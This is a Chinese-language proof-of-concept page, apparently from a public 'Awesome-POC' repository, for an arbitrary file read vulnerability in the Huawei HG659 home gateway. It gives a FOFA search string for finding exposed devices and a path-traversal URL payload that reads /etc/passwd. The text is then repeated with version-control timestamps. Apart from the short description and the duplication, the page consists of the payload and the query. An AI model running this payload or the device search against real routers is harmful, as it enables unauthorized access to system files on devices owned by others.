Awesome-POC/网络设备漏洞/Huawei HG659 lib 任意文件读取漏洞.md

# Huawei HG659 lib 任意文件读取漏洞

## 漏洞描述

Huawei HG659 lib 存在任意文件读取漏洞，攻击者通过漏洞可以读取任意文件

## 漏洞影响

```
Huawei HG659
```

## FOFA

```
app="HUAWEI-Home-Gateway-HG659"
```

## 漏洞复现

登录页面如下

![](./images/202202110951141.png)

POC如下

```plain
/lib///....//....//....//....//....//....//....//....//etc//passwd
```

![](./images/202202110951927.png)
update gitbook 2022-02-20 16:14:31 +08:00			`# Huawei HG659 lib 任意文件读取漏洞`

			`## 漏洞描述`

			`Huawei HG659 lib 存在任意文件读取漏洞，攻击者通过漏洞可以读取任意文件`

			`## 漏洞影响`

			```
			`Huawei HG659`
			```

			`## FOFA`

			```
			`app="HUAWEI-Home-Gateway-HG659"`
			```

			`## 漏洞复现`

			`登录页面如下`

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202202110951141.png)`
update gitbook 2022-02-20 16:14:31 +08:00
			`POC如下`

			```plain
			`/lib///....//....//....//....//....//....//....//....//etc//passwd`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202202110951927.png)`